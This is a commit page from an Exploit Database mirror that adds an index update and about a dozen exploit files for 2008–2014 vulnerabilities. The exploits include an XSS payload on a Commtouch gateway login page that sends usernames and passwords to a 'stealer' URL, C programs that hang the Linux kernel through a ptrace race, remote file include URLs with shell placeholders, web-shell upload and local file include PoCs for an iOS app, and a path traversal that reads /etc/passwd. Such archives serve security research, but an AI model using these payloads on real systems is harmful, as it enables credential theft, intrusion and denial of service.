bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 03_01_2014

Browse source
This commit is contained in:
Offensive Security 2014-03-01 04:27:47 +00:00
parent 0007ea1915
commit 37e7d441f8
24 changed files with 883 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

25
files.csv
View file

@ -28664,7 +28664,7 @@ id,file,description,date,author,platform,type,port
31871,platforms/asp/webapps/31871.txt,"Te Ecard - 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-06-02,"Ugurcan Engyn",asp,webapps,0
31872,platforms/multiple/dos/31872.py,"NASA Ames Research Center BigView 1.8 - (.PNM File) Stack-Based Buffer Overflow Vulnerability",2008-06-04,"Alfredo Ortega",multiple,dos,0
31873,platforms/windows/remote/31873.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'ExtractCab' ActiveX Control Buffer Overflow Vulnerability",2008-06-03,"Dennis Rand",windows,remote,0
31875,platforms/linux/remote/31875.py,"Python socket.recvfrom_into() - Remote Buffer Overflow",2014-02-24,@sha0coder,linux,remote,0
31875,platforms/linux/remote/31875.py,"Python socket.recvfrom_into() - Remote Buffer Overflow",2014-02-24,Sha0,linux,remote,0
31876,platforms/windows/dos/31876.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'StartApp' ActiveX Control Insecure Method Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0
31877,platforms/windows/dos/31877.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'RegistryString' Buffer Overflow Vulnerability",2008-06-04,"Dennis Rand",windows,dos,0
31878,platforms/windows/dos/31878.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Creation Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0
@ -28684,8 +28684,10 @@ id,file,description,date,author,platform,type,port
31892,platforms/cgi/webapps/31892.txt,"Tornado Knowledge Retrieval System 4.2 - 'p' Parameter Cross Site Scripting Vulnerability",2008-06-10,Unohope,cgi,webapps,0
31893,platforms/php/webapps/31893.txt,"Hot Links SQL-PHP - Multiple Cross Site Scripting Vulnerabilities",2008-06-10,sl4xUz,php,webapps,0
31894,platforms/hardware/webapps/31894.txt,"Technicolor TC7200 - Credentials Disclosure",2014-02-25,"Jeroen - IT Nerdbox",hardware,webapps,80
31895,platforms/windows/local/31895.txt,"Notepad++ CCompletion Plugin 1.19 - Stack Buffer Overflow",2014-02-25,tishion,windows,local,0
31896,platforms/hardware/webapps/31896.txt,"WiFiles HD 1.3 iOS - File Inclusion Vulnerability",2014-02-25,Vulnerability-Lab,hardware,webapps,8080
31898,platforms/php/webapps/31898.txt,"Sendy 1.1.8.4 - SQL Injection Vulnerability",2014-02-25,Hurley,php,webapps,80
31899,platforms/windows/dos/31899.txt,"VLC 2.1.3 - (.avs file) Crash PoC",2014-02-25,kw4,windows,dos,0
31900,platforms/hardware/webapps/31900.txt,"Private Camera Pro 5.0 iOS - Multiple Vulnerabilities",2014-02-25,Vulnerability-Lab,hardware,webapps,0
31901,platforms/multiple/remote/31901.txt,"Sun Glassfish 2.1 - 'name' Parameter Cross Site Scripting Vulnerability",2008-06-10,"Eduardo Neves",multiple,remote,0
31902,platforms/php/webapps/31902.txt,"Noticia Portal - 'detalle_noticia.php' SQL Injection Vulnerability",2008-06-10,t@nzo0n,php,webapps,0
@ -28697,6 +28699,8 @@ id,file,description,date,author,platform,type,port
31908,platforms/php/webapps/31908.txt,"Flat Calendar 1.1 - Multiple Administrative Scripts Authentication Bypass Vulnerabilities",2008-06-11,Crackers_Child,php,webapps,0
31909,platforms/windows/remote/31909.html,"XChat 2.8.7b - 'ircs://' URI Command Execution Vulnerability",2008-06-13,securfrog,windows,remote,0
31910,platforms/php/webapps/31910.txt,"vBulletin 3.6.10/3.7.1 - 'redirect' Parameter Cross-Site Scripting Vulnerability",2008-06-13,anonymous,php,webapps,0
31913,platforms/windows/dos/31913.pl,"Music AlarmClock 2.1.0 - (.m3u) Crash PoC",2014-02-26,"Gabor Seljan",windows,dos,0
31914,platforms/windows/dos/31914.pl,"GoldMP4Player 3.3 - Buffer Overflow PoC (SEH)",2014-02-26,"Gabor Seljan",windows,dos,0
31915,platforms/linux/dos/31915.py,"GoAhead Web Server 3.1.x - Denial of Service",2014-02-26,"Alaeddine MESBAHI",linux,dos,80
31916,platforms/php/webapps/31916.txt,"Piwigo 2.6.1 - CSRF Vulnerability",2014-02-26,killall-9,php,webapps,80
31917,platforms/windows/remote/31917.rb,"Symantec Endpoint Protection Manager - Remote Command Execution",2014-02-26,metasploit,windows,remote,9090
@ -28730,3 +28734,22 @@ id,file,description,date,author,platform,type,port
31945,platforms/php/webapps/31945.txt,"PEGames Multiple Cross Site Scripting Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
31946,platforms/php/webapps/31946.txt,"IDMOS 1.0 'site_absolute_path' Parameter Multiple Remote File Include Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
31947,platforms/php/webapps/31947.txt,"EXP Shop 1.0 Joomla! 'com_expshop' Component SQL Injection Vulnerability",2008-06-22,His0k4,php,webapps,0
31948,platforms/php/webapps/31948.txt,"Open Digital Assets Repository System 1.0.2 Remote File Include Vulnerability",2008-06-22,CraCkEr,php,webapps,0
31949,platforms/php/webapps/31949.txt,"Chipmunk Blog members.php membername Parameter XSS",2008-06-23,sl4xUz,php,webapps,0
31950,platforms/php/webapps/31950.txt,"Chipmunk Blog comments.php membername Parameter XSS",2008-06-23,sl4xUz,php,webapps,0
31951,platforms/php/webapps/31951.txt,"Chipmunk Blog photos.php membername Parameter XSS",2008-06-23,sl4xUz,php,webapps,0
31952,platforms/php/webapps/31952.txt,"Chipmunk Blog archive.php membername Parameter XSS",2008-06-23,sl4xUz,php,webapps,0
31953,platforms/php/webapps/31953.txt,"Chipmunk Blog cat.php membername Parameter XSS",2008-06-23,sl4xUz,php,webapps,0
31954,platforms/php/webapps/31954.txt,"Benja CMS 0.1 /admin/admin_edit_submenu.php URL XSS",2008-06-23,"CWH Underground",php,webapps,0
31955,platforms/php/webapps/31955.txt,"Benja CMS 0.1 /admin/admin_new_submenu.php URL XSS",2008-06-23,"CWH Underground",php,webapps,0
31956,platforms/php/webapps/31956.txt,"Benja CMS 0.1 /admin/admin_edit_topmenu.php URL XSS",2008-06-23,"CWH Underground",php,webapps,0
31959,platforms/linux/local/31959.txt,"Perl 'rmtree()' Function Local Insecure Permissions Vulnerability",2008-06-23,"Frans Pop",linux,local,0
31960,platforms/php/webapps/31960.txt,"A+ PHP Scripts News Management System 0.3 Multiple Input Validation Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
31961,platforms/php/webapps/31961.txt,"GDL 4.2 - Multiple Vulnerabilities",2014-02-27,ByEge,php,webapps,80
31962,platforms/hardware/webapps/31962.txt,"Bluetooth Photo Share Pro 2.0 iOS - Multiple Vulnerabilities",2014-02-27,Vulnerability-Lab,hardware,webapps,8080
31963,platforms/php/webapps/31963.txt,"E-topbiz Link ADS 1 'out.php' SQL Injection Vulnerability",2008-06-24,"Hussin X",php,webapps,0
31964,platforms/windows/dos/31964.txt,"5th street 'dx8render.dll' Format String Vulnerability",2008-06-25,superkhung,windows,dos,0
31965,platforms/linux/dos/31965.c,"Linux Kernel utrace and ptrace Local Denial of Service Vulnerability (1)",2008-06-25,"Alexei Dobryanov",linux,dos,0
31966,platforms/linux/dos/31966.c,"Linux Kernel utrace and ptrace Local Denial of Service Vulnerability (2)",2008-06-25,"Alexei Dobryanov",linux,dos,0
31967,platforms/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway 'PARAMS' Parameter Cross-Site Scripting Vulnerability",2008-06-26,"Erez Metula",asp,webapps,0
31968,platforms/linux/dos/31968.txt,"GNOME Rhythmbox 0.11.5 Malformed Playlist File Denial Of Service Vulnerability",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0

Can't render this file because it is too large.

18
platforms/asp/webapps/31967.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/29957/info
Commtouch Anti-Spam Enterprise Gateway is prone to a cross-site scripting vulnerability because the device fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Commtouch Anti-Spam Enterprise Gateway 4 and 5 are vulnerable; other versions may also be affected.
http://www.example.com/AntiSpamGateway/UPM/English/login/login.asp?LoginName=XXX&LoginType=1&DIRECTTO=3&PARAMS=XXX"><script>function
SendCredentials(){ img = new Image();
img.src="http://www.example2.com/stealer/?userid=" +
document.forms[0].LoginName.value + "&amp;password=" +
document.forms[0].LoginPass.value;} function HandleSubmit(){
document.forms[0].onsubmit= SendCredentials; } window.onload =
HandleSubmit;</script><input%20type="hidden"%20name="Params2"%20value="x
http://www.example.com/AntiSpamGateway/UPM/English/login/login.asp?LoginName=XXX&LoginType=1&PARAMS=XXX"><SCRIPT>PAYLOAD
</SCRIPT><input%20type="hidden"%20name="XXX"%20value="X

271
platforms/hardware/webapps/31962.txt Executable file
View file

@ -0,0 +1,271 @@
Document Title:
===============
Bluetooth Photo Share Pro v2.0 iOS - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1218
Release Date:
=============
2014-02-27
Vulnerability Laboratory ID (VL-ID):
====================================
1218
Common Vulnerability Scoring System:
====================================
6.7
Product & Service Introduction:
===============================
This is the best bluetooth sharing and file transfer app in app store. Transfer photos, videos, music,
contacts and any file between two iPhone,iPad and/or iPod Touches over bluetooth connection. Requires
iPhone 3G or later or 2nd generation iPod Touch or later . Does not require any 3G or WiFi connection.
(Copy of the Homepage: https://itunes.apple.com/us/app/bluetooth-photo-video-music/id590196698 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Bluetooth Photo/Video/Music/Contact Share Pro v2.0 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2014-02-27: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Apple AppStore
Product: Bluetooth Photo Share - iOS Mobile Web Application 2.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the officialBluetooth Photo/Video/Music/Contact Share Pro v2.0 iOS mobile application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands
to compromise the web-application or mobile device.
The web vulnerability is located in the `filename` value of the `Select File to Upload` function POST method request. Remote attackers are
able to inject own files with malicious `filename` to compromise the mobile application. The attack vector is persistent and the request
method is POST. The local file/path include execution occcurs in the main index file dir list of the path section after the regular upload.
The security risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system)
count of 7.4(+)|(-)7.5.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password.
Successful exploitation of the local web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Select File > Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir List (http://localhost:8080)
1.2
An arbitrary file upload web vulnerability has been discovered in the officialBluetooth Photo/Video/Music/Contact Share Pro v2.0 iOS mobile application.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
The vulnerability is located in the `upload` (video and images) module. Remote attackers are able to upload a php or js web-shells by renaming
the file with multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name
and extension `image.gif.jpg.html.js.aspx.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg &
.gif file extension and can access the application with elevated access rights. The security risk of the arbitrary file upload web vulnerability is
estimated as high with a cvss (common vulnerability scoring system) count of 6.1(+)|(-)6.2.
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Select File > Upload
Vulnerable Parameter(s):
[+] filename (multiple extensions)
Affected Module(s):
[+] Index File Dir List (http://localhost:8080/)
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by remote attackers without privileged web-application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided steps and information below to continue.
PoC: filename
<table id="filetable" cellpadding="0" cellspacing="0" width="860px">
<thead><tr><th class="file">File Name</th><th style="padding-left:15px">File Size</th><th class="actionbutton"></th><th class="actionbutton"></th></tr></thead>
<tbody id="filelist" style="padding-left:15px;">
<tr><td class="file"><a href="/files/[LOCAL FILE INCLUDE WEB VULNERABILITY!]" class="file"><./[LOCAL FILE INCLUDE WEB VULNERABILITY!]"></a></td>
<td class='info'>23.81K</td><td class='actionbutton' >
<form><input type='button' value='Download' onClick="window.location.href='/files/[LOCAL FILE INCLUDE WEB VULNERABILITY!]'"></form></td><td class='actionbutton' >
<form action='/files/[LOCAL FILE INCLUDE WEB VULNERABILITY!]' method='post' ><input name='_method' value='delete' type='hidden'/><input name="commit" type="submit"
value="Delete" class='button' /></form></td></tr></tbody></table></iframe></a></td></tr></tbody></table>
--- PoC Session Logs [POST] ---
20:31:19.936[165ms][total 165ms] Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------10162615616712
Content-Disposition: form-data; name="newfile"; filename="./[LOCAL FILE INCLUDE VULNERABILITY]<"
Content-Type: image/jpeg
20:31:21.700[156ms][total 222ms] Status: 200[OK]
GET http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[61465] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[61465]
Date[Mi., 26 Feb. 2014 19:40:03 GMT]
20:31:22.980[46ms][total 46ms] Status: 404[Not Found]
GET http://localhost:8080/a Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[0]
Date[Mi., 26 Feb. 2014 19:40:04 GMT]
1.2
The arbitrary file upload vulnerability can be exploited by remote attackers without privileged web-application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided steps and information below to continue.
PoC: filename as path
http://localhost:8080/files/[ARBITRARY FILE UPLOAD VULNERABILITY!]"
--- PoC Session Logs [POST] ---
20:31:19.936[165ms][total 165ms] Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------10162615616712
Content-Disposition: form-data; name="newfile"; filename="./[ARBITRARY FILE UPLOAD VULNERABILITY!].jpeg.gif.php.js.aspx.gif.jpeg<"
Content-Type: image/jpeg
Solution - Fix & Patch:
=======================
1.1
The first vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the upload POST method request.
1.2
The second vulnerability can be patched by a secure restriction of the filename value user input in the upload POST method request.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability is estimated as high(+).
1.2
The security risk of the arbitrary file upload web vulnerability is estimated as high(-).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

20
platforms/linux/dos/31965.c Executable file
View file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/29945/info
The Linux kernel is prone to a local denial-of-service vulnerability caused by a race condition.
Attackers can exploit this issue to cause the kernel to become unresponsive, denying service to legitimate users.
#include <stdlib.h>
#include <sys/ptrace.h>
int main(int argc, char *argv[])
{
pid_t pid = atoi(argv[1]);
while (1)
ptrace(PTRACE_ATTACH, pid, NULL, NULL);
return 0;
}

102
platforms/linux/dos/31966.c Executable file
View file

@ -0,0 +1,102 @@
source: http://www.securityfocus.com/bid/29945/info
The Linux kernel is prone to a local denial-of-service vulnerability caused by a race condition.
Attackers can exploit this issue to cause the kernel to become unresponsive, denying service to legitimate users.
/* This software is provided 'as-is', without any express or implied
warranty. In no event will the authors be held liable for any
damages
arising from the use of this software.
Permission is granted to anyone to use this software for any purpose,
including commercial applications, and to alter it and redistribute
it
freely. */
#ifdef __ia64__
#define ia64_fpreg ia64_fpreg_DISABLE
#define pt_all_user_regs pt_all_user_regs_DISABLE
#endif /* __ia64__ */
#include <sys/ptrace.h>
#ifdef __ia64__
#undef ia64_fpreg
#undef pt_all_user_regs
#endif /* __ia64__ */
#include <linux/ptrace.h>
#include <sys/types.h>
#include <sys/user.h>
#if defined __i386__ || defined __x86_64__
#include <sys/debugreg.h>
#endif
#include <stdio.h>
#include <unistd.h>
#include <pthread.h>
#include <signal.h>
#include <stdlib.h>
#include <string.h>
/* WARNING: The real testing count is probably unbound. */
#define DEFAULT_TESTTIME 10 /* seconds */
static pid_t pid;
static void
cleanup (void)
{
if (pid != 0)
kill (pid, SIGKILL);
}
static void
handler_fail (int signo)
{
cleanup ();
signal (signo, SIG_DFL);
raise (signo);
}
static void *thread_func(void *argv0_pointer)
{
execl("/proc/self/exe", argv0_pointer, "child", NULL);
abort ();
/* NOTREACHED */
}
int main(int argc, const char *argv[])
{
char *testtime = getenv ("TESTTIME");
time_t testend = time (NULL) + (testtime != NULL ? atoi
(testtime)
:
DEFAULT_TESTTIME);
unsigned long loops;
pthread_t thread;
atexit (cleanup);
signal (SIGABRT, handler_fail);
signal (SIGINT, handler_fail);
if ((argc != 2 || strcmp (argv[1], "child") != 0) && (pid =
fork())) {
loops = 0;
do {
ptrace(PTRACE_ATTACH, pid, NULL, 0);
ptrace(PTRACE_DETACH, pid, NULL, 0);
loops++;
} while (time (NULL) < testend);
return 0;
}
if (pthread_create(&thread, NULL, thread_func, (void *)
argv[0]))
perror("pthread_create");
while (1)
pause();
/* NOTREACHED */
abort ();
}

12
platforms/linux/dos/31968.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/29958/info
GNOME Rhythmbox is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted input.
Exploiting this issue allows remote attackers to crash the application and trigger denial-of-service conditions, denying further service to legitimate users. Given the nature of this issue, code execution may be possible, but this has not been confirmed.
GNOME Rhythmbox 0.11.5 is vulnerable; other versions may also be affected.
[playlist]
X-GNOME-Title=
Title= A * 1475
NumberOfEntries=0

17
platforms/linux/local/31959.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/29902/info
Computers running Perl are prone to a local vulnerability that occurs when handling symbolic links.
Attackers can leverage this issue to change the permissions of arbitrary files.
Perl 5.10.0 is vulnerable; other versions may also be affected.
% touch foo
% ln -s foo bar
% ls -l foo bar
lrwxrwxrwx 1 example example 3 2008-06-21 09:06 bar -> foo
-rw-r--r-- 1 example example 0 2008-06-21 09:06 foo
% perl -e 'use File::Path rmtree; rmtree bar'
% ls -l foo bar
ls: cannot access bar: No such file or directory
-rwxrwxrwx 1 example example 0 2008-06-21 09:06 foo

9
platforms/php/webapps/31948.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29881/info
Open Digital Assets Repository System (ODARS) is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
ODARS 1.0.2 is vulnerable; other versions may be affected as well.
http://www.example.com/path/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=[SHELL]

8
platforms/php/webapps/31949.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/29883/info
Chipmunk Blog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/path/members.php?membername=[XSS]
http://www.example.com/path/members.php?membername=%22%3E%3Cscript%3Ealert(123);%3C/script%3E

8
platforms/php/webapps/31950.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/29883/info
Chipmunk Blog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/path/comments.php?membername=[XSS]
http://www.example.com/path/comments.php?membername=%22%3E%3Cscript%3Ealert(123);%3C/script%3E

8
platforms/php/webapps/31951.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/29883/info
Chipmunk Blog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/path/photos.php?membername=[XSS]
http://www.example.com/path/photos.php?membername=%22%3E%3Cscript%3Ealert(123);%3C/script%3E

8
platforms/php/webapps/31952.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/29883/info
Chipmunk Blog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/path/archive.php?membername=[XSS]
http://www.example.com/path/archive.php?membername=%22%3E%3Cscript%3Ealert(123);%3C/script%3E

8
platforms/php/webapps/31953.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/29883/info
Chipmunk Blog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/path/cat.php?membername=[XSS]
http://www.example.com/path/cat.php?membername=%22%3E%3Cscript%3Ealert(123);%3C/script%3E

9
platforms/php/webapps/31954.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29884/info
The 'benja CMS' program is prone to multiple vulnerabilities because it fails to adequately validate input and restrict access. These issues include three cross-site scripting issues, an arbitrary-file-upload issue, and a vulnerability that allows unauthorized access to an administrative script.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, to run arbitrary script code in the context of the application, or to access administrative scripts.
These issues affect 'benja CMS 0.1'; other versions may also be affected.
http://www.example.com/[benjacms_path]/admin/admin_edit_submenu.php/<XSS>

9
platforms/php/webapps/31955.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29884/info
The 'benja CMS' program is prone to multiple vulnerabilities because it fails to adequately validate input and restrict access. These issues include three cross-site scripting issues, an arbitrary-file-upload issue, and a vulnerability that allows unauthorized access to an administrative script.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, to run arbitrary script code in the context of the application, or to access administrative scripts.
These issues affect 'benja CMS 0.1'; other versions may also be affected.
http://www.example.com/[benjacms_path]/admin/admin_new_submenu.php/<XSS>

9
platforms/php/webapps/31956.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29884/info
The 'benja CMS' program is prone to multiple vulnerabilities because it fails to adequately validate input and restrict access. These issues include three cross-site scripting issues, an arbitrary-file-upload issue, and a vulnerability that allows unauthorized access to an administrative script.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, to run arbitrary script code in the context of the application, or to access administrative scripts.
These issues affect 'benja CMS 0.1'; other versions may also be affected.
http://www.example.com/[benjacms_path]/admin/admin_edit_topmenu.php/<XSS>

12
platforms/php/webapps/31960.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/29912/info
A+ PHP Scripts News Management System is prone to multiple input-validation vulnerabilities, including a remote file-include issue, multiple local file-include issues, and a cross-site scripting issue.
An attacker can exploit these vulnerabilities to include and execute local and remote scripts in the context of the webserver process. Attackers can also execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
These issues affect News Management System 0.3; other versions may also be vulnerable.
http://www.example.com/A_PHP_Scripts_News_Management_System_03/news/admin/system/include.php?skindir=[SHELL]
http://www.example.com/A_PHP_Scripts_News_Management_System_03/news/admin/register.php?skindir=[LFI]
http://www.example.com/A_PHP_Scripts_News_Management_System_03/news/admin/login.php?skindir=[LFI]
http://www.example.com/A_PHP_Scripts_News_Management_System_03/news/admin/register.php?e=[XSS]

124
platforms/php/webapps/31961.txt Executable file
View file

@ -0,0 +1,124 @@
-> Title : GDL 4.2 Multiple Vulnerabilities
-> Down. Script : http://kmrg.itb.ac.id/ - http://kmrg.itb.ac.id/gdl42.zip
-> Author : ByEge
-> Home : http://byege.blogspot.com.tr/
-> Tested : Apache/2.2.22 (Win32) PHP/5.4.3
-> Date : 26/02/2014
-> Google Dork : "Powered by GDL 4.2" And "gdl.php?mod=browse"
-> Thanks : F0RTYS3V3N - Cyb3rking - ameN
-> Keyfi : http://www.youtube.com/watch?v=wKGMk56zSPI --> Yaz dostum bo?a geçmi? ömre ya?am denir mi ?
-> Not : Kendini geli?tirmek isteyen arkada?lar kod analizi için kullanabilirsiniz scripti, bir çok güvenlik zaafiyeti var.
###################################
#Directory traversal vulnerability#
###################################
http://localhost/gdl.php?newlang=../../../../../../../../../../etc/passwd%00
http://localhost/index.php?newlang=../../../../../../../../../../etc/passwd%00
Line : gdl42/class/session.php 96 - 99 parameter : newlang
// Setting bahasa
$lang = $_COOKIE['gdl_lang'];
$newlang = $_GET['newlang'];
if (isset($newlang)) {
if (file_exists("./lang/$newlang.php")) {
setcookie("gdl_lang",$newlang,time()+($gdl_sys['page_caching'] * 60));
$gdl_content->language=$newlang;
} else {
setcookie("gdl_lang",$gdl_sys['language'],time()+($gdl_sys['page_caching'] * 60));
$gdl_content->language=$gdl_sys['language'];
}
} elseif (isset($lang)) {
$gdl_content->language=$lang;
}else{
setcookie("gdl_lang",$gdl_sys['language'],time()+($gdl_sys['page_caching'] * 60));
$gdl_content->language=$gdl_sys['language'];
}
}
function set_theme(){
global $gdl_content, $gdl_sys;
--------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
